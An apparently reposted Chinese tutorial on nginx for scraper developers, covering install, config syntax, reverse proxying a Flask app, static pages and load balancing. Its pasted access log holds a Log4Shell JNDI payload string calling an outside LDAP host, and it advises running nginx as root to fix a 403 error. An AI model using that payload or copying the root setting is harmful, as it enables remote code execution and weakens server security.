爬蟲與反爬蟲的較量總是圍繞著Web網站展開,爬蟲的主要目的是獲取Web網站中的內容,開發者想要限制爬蟲獲取資料,就需要了解HTML從檔案變成內容豐富的頁面所要經歷的每個階段,例如網路請求、資源匹配、資料傳輸和頁面渲染,因此在學習爬蟲之前,我們需要先了解web網站的構成和頁面渲染程序的相關知識,
web網站由服務端與客戶端組成,服務器主要負責為客戶端提供檔案資源的提取與資料的保存服務,而客戶端則是將服務器的資源轉化為用戶可讀的內容,服務器端與客戶端之間的資訊互動需要通過網路進行傳輸,而網路傳輸會根據對應的網路協議進行,如果客戶端與服務端要進行通信,兩者需要使用相同的網路協議,
nginx 服務器
Web網站的功能由編程語言來實作,編程語言專注的是功能實作,資源的映射與連接處理是由服務器軟體完成,常見的服務器主要有Apache、nginx和Tomcat等,接下來我們就對nginx來增進對服務器的了解,
nginx是一個HTTP和反向代理服務器,同時也是郵件代理服務器和通用的TCP/UDP代理服務器,它具有模塊化設計,可拓展、低記憶體消耗、支持熱部署等優秀特性,所以非常多的web應用將其作為服務器軟體,
nginx有一個主行程和若干作業行程,其中主行程用于讀取和評估配置并維護作業行程,作業行程會對請求進行實際處理,nginx采用基于事件的模型和依賴于作業系統的機制,有效的作業行程之間分發請求,作業行程數在組態檔中進行定義,可以設定具體數值或使用默認選項,

nginx有一個主行程和多個作業行程,主行程主要用于維護自身運轉,例如讀取配置、維護作業行程、重新載入配置等,作業行程是具體回應請求的行程,nginx的作業行程數是確定的,并不是說來一個任務才開啟一個行程,它的作業行程數可以在組態檔中更改,
快速安裝nginx
你都學到nginx了,這里強烈建議大家一定要去購買云服務器來操作,我這里使用的是Centos7.6版本的Linux作業系統,
連接云服務器的終端,輸入下面的命令即可安裝nginx,
yum install nginx
復制代碼
安裝完畢之后,在你的瀏覽器訪問服務器的IP地址即可,
nginx 信號
信號是控制nginx作業狀態的模塊,信號語法格式為:
nginx -s signal
復制代碼
常用的信號有:
stop 快速關停
quit 正常關停
reload 重新載入配置
reopen 重新打開日志檔案
復制代碼
nginx的正確關停,是nginx -s quit,它可以讓nginx處理完已經開始的的作業再退出,
nginx配置說明
nginx有主組態檔和輔助組態檔,主組態檔默認名稱是nginx.conf,默認存放在/etc/nginx/nginx.conf,輔助配置的檔案名稱和路徑都可以更改,檔案名稱通常以conf結尾,
通過status找到nginx的Server組態檔
systemctl status nginx
復制代碼
[Unit]
Description=The nginx HTTP and reverse proxy server
After=network-online.target remote-fs.target nss-lookup.target
Wants=network-online.target
[Service]
Type=forking
PIDFile=/run/nginx.pid
# Nginx will fail to start if /run/nginx.pid already exists but has the wrong
# SELinux context. This might happen when running `nginx -t` from the cmdline.
# https://bugzilla.redhat.com/show_bug.cgi?id=1268621
ExecStartPre=/usr/bin/rm -f /run/nginx.pid
ExecStartPre=/usr/sbin/nginx -t
ExecStart=/usr/sbin/nginx
ExecReload=/usr/sbin/nginx -s reload
KillSignal=SIGQUIT
TimeoutStopSec=5
KillMode=process
PrivateTmp=true
[Install]
WantedBy=multi-user.target
復制代碼
查找主組態檔
[root@VM-8-9-centos ~]# find / -name nginx.conf
/etc/nginx/nginx.conf
復制代碼
主組態檔基本結構和作用
user nginx; # 用戶
worker_processes auto; # 行程數
error_log /var/log/nginx/error.log; # 錯誤日志
pid /run/nginx.pid; # 行程檔案
# Load dynamic modules. See /usr/share/doc/nginx/README.dynamic.
include /usr/share/nginx/modules/*.conf; # 插件模塊配置
events {
worker_connections 1024; # 允許同時連接的連接數
}
http {
log_format main '$remote_addr - $remote_user [$time_local] "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';
access_log /var/log/nginx/access.log main; # 日志檔案
sendfile on;
tcp_nopush on;
tcp_nodelay on;
keepalive_timeout 65;
types_hash_max_size 4096;
include /etc/nginx/mime.types;
default_type application/octet-stream;
# Load modular configuration files from the /etc/nginx/conf.d directory.
# See http://nginx.org/en/docs/ngx_core_module.html#include
# for more information.
include /etc/nginx/conf.d/*.conf; # 輔助組態檔
server {
listen 80;
listen [::]:80;
server_name _;
root /usr/share/nginx/html;
# Load configuration files for the default server block.
include /etc/nginx/default.d/*.conf;
error_page 404 /404.html;
location = /404.html {
}
error_page 500 502 503 504 /50x.html;
location = /50x.html {
}
}
# Settings for a TLS enabled server.
#
# server {
# listen 443 ssl http2;
# listen [::]:443 ssl http2;
# server_name _;
# root /usr/share/nginx/html;
#
# ssl_certificate "/etc/pki/nginx/server.crt";
# ssl_certificate_key "/etc/pki/nginx/private/server.key";
# ssl_session_cache shared:SSL:1m;
# ssl_session_timeout 10m;
# ssl_ciphers HIGH:!aNULL:!MD5;
# ssl_prefer_server_ciphers on;
#
# # Load configuration files for the default server block.
# include /etc/nginx/default.d/*.conf;
#
# error_page 404 /404.html;
# location = /40x.html {
# }
#
# error_page 500 502 503 504 /50x.html;
# location = /50x.html {
# }
# }
復制代碼
通過命令
nginx的作業行程數等于CPU的數量+1
反向代理
一圖勝千言,

反向代理服務器一般都是用于大型互聯網公司中,中小型公司也應該會使用,從上圖可以看出客戶端發出請求,想要獲取Server服務器上的內容,但請求將被先發送到代理服務器proxy,這個代理服務器把請求代理到和自己屬于同一個LAN上的內部服務器上,而服務器,即向外部客戶端提供一個統一的代理入口,客戶端發出請求都會先通過這個代理服務器,至于內網是訪問哪臺服務器,由proxy去控制,
為什么使用反向代理
1、安全及權限
使用反向代理服務器之后,用戶端無法直接通過請求訪問真正的服務器,
2、負載均衡
例如一個網站的內容被部署到若干臺服務器上,可以把這些機子看作是集群,那么nginx把收到的請求平均分配到每個不同的服務器上,不會造成一個服務器的壓力過大,這就實作了負載均衡,
正向代理
正向代理應該就會比反向代理要好理解很多,其實大家所使用的翻墻工具就是一個正向代理工具,它會把訪問墻外服務器Server的網頁請求,代理到一個可以訪問該網站的代理服務器proxy,這個代理服務器proxy會把墻外服務器Server上的網頁內容獲取,再轉發給客戶,

nginx組態檔的基礎語法
nginx組態檔中的配置項成為指令,指令分為簡單指令和塊指令,簡單的指令由指令名稱和引陣列成,以空格進行分隔并以英文符號結尾,例如:
worker_processes auto;
復制代碼
worker_processes:指令名稱,作用是設定作業行程數
auto:命令引數,表示行程數量,可以是數字也可以是auto(根據CPU數量固定數學公式計算,一般是CPU+1),
塊指令語法格式與簡單指令類似,單以花括號包裹更多的簡單指令,例如:
http {
server{
...
}
}
復制代碼
背景關系
背景關系也稱為語境,如果塊指令包含其他指令,則這個指令稱為背景關系,常見的背景關系例如:
envents
http
server
location
復制代碼
有一個隱藏的背景關系指令,main,它不需要顯示宣告,所有指令的最外層就是main的范圍,main作為其他背景關系的參考,例如events和http必須在main范圍中,server必須在http中;location必須在server中,
部署flask到服務器運行
flask代碼,如下:
from flask import Flask
from flask_restful import Resource, Api
app = Flask(__name__)
api = Api(app)
class HelloWord(Resource):
def get(self):
app.logger.info('receive a request, and response 劍南的編程之路')
return {'message': '劍南的編程之路', 'address': 'https://www.kenshujun.cn'}
api.add_resource(HelloWord, '/')
if __name__ == '__main__':
app.run(debug=True, port=5000, host='0.0.0.0')
復制代碼
app.run(debug=True, port=6789, host='0.0.0.0')
這一行代碼是需要注意的,因為是放在服務器上運行,需要客戶端可以正常的訪問,因此在生產環境下運行這段代碼,需要將host和debug進行更改,在瀏覽器中輸入服務器的IP地址加埠號即可獲取回應,
注意:如果還是無法訪問的話,可能的原因就是沒有打開防火墻的埠,添加安全規則即可,
但是這種部署的方式是不安全的,暴露了真正服務器的埠資訊,
在服務器啟動之后,可以通過配置nginx實作反向代理,在輔助組態檔的目錄新增組態檔,
> vim /etc/nginx/conf.d/fls.conf
復制代碼
server {
listen 8888;
server_name localhost;
location / {
proxy_pass http://localhost:5000;
}
}
復制代碼
檢查語法是否正確
> nginx -t
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
復制代碼
出現上面所展示的結果,則說明配置成功,
重新載入配置
nginx -s reload
復制代碼
瀏覽器訪問http://ip:port,例如我的服務器http://119.91.75.14:8888/
查看nginx日志檔案
> cat /var/log/nginx/access.log
107.189.29.181 - - [19/Dec/2021:21:38:58 +0800] "GET / HTTP/1.1" 200 4833 "-" "${jndi:ldap://179.43.175.101:1389/jedmdg}" "-"
209.141.50.223 - - [19/Dec/2021:21:45:04 +0800] "GET /config/getuser?index=0 HTTP/1.1" 404 3650 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-"
121.33.147.185 - - [19/Dec/2021:21:50:50 +0800] "GET / HTTP/1.1" 200 107 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0" "-"
復制代碼
部署靜態頁面
靜態頁面的HTML代碼如下:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>靜態頁面(kenshujun.com)</title>
</head>
<body>
<h1>我的第一個標題</h1>
<p>我的第一個段落,</p>
</body>
</html>
復制代碼
接下來在輔助配置下撰寫組態檔
server {
listen 9999;
server_name loaclhost;
charset utf-8;
location / {
root /root;
index index.html index.htm;
}
}
復制代碼
和前面相同,寫完組態檔之后進行檢查以及多載,
如果訪問時出現403錯誤,那就是權限不夠,需要去主組態檔修改權限,
vim /etc/nginx/nginx.conf
復制代碼
user root; # 修改為root
worker_processes auto;
error_log /var/log/nginx/error.log;
pid /run/nginx.pid;
復制代碼
接下來便可以訪問http://ip:port
基于nginx實作負載均衡
想象一個場景,例如現在你的服務器上的后端服務主要用于格式化時間,有很多爬蟲程式需要呼叫它,而且還需要確保服務的穩定可行,
場景延申:假設你有一個JS演算法,現在所有爬蟲都需要在發出請求前呼叫這個演算法,生成sign值,帶著值去請求,如果你把JS代碼放在python/golang這類代碼里做本地除錯執行,那么你改動演算法時需要重新部署所有的爬蟲程式,但是做成web服務,只需要重啟web服務即可,
一個后端服務有兩個明顯的缺點
1、服務性能不夠,請求太多會導致程式卡頓,回應速度慢,影響整體效率;
2、服務整體不穩定,一旦行程退出或者服務器死機,那么服務將不可訪問,
使用負載均衡的好處
1、啟動多個后端服務,配置負載均衡,讓請求按需(例如輪流)轉發到它們那里進行處理,那么就能夠承擔更多的作業需求,
2、一個nginx負載多個后端服務,當一個服務或者幾個服務出現行程退出的情況,還有其他服務在作業,
實作負載均衡
nginx只需要引入proxy_pass指令和upstream背景關系即可實作負載均衡,一個簡單的負載均衡配置如下:
upstream backend{
server localhost:5000;
server localhost:6000;
}
server {
listen 8888;
server_name localhost;
location / {
proxy_pass http://backend;
}
}
復制代碼
保存后重新載入即可,
域名決議與配置實戰
打開云服務器控制臺,進入域名決議(購買域名并備案),點擊決議,輸入子域名名稱、服務器IP地址后選擇保存即可,
接下來修改輔助組態檔,更改埠,系結域名
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/389046.html
標籤:其他
上一篇:樹莓派--搭建蜜罐
下一篇:計算機為何可以運行Java代碼?
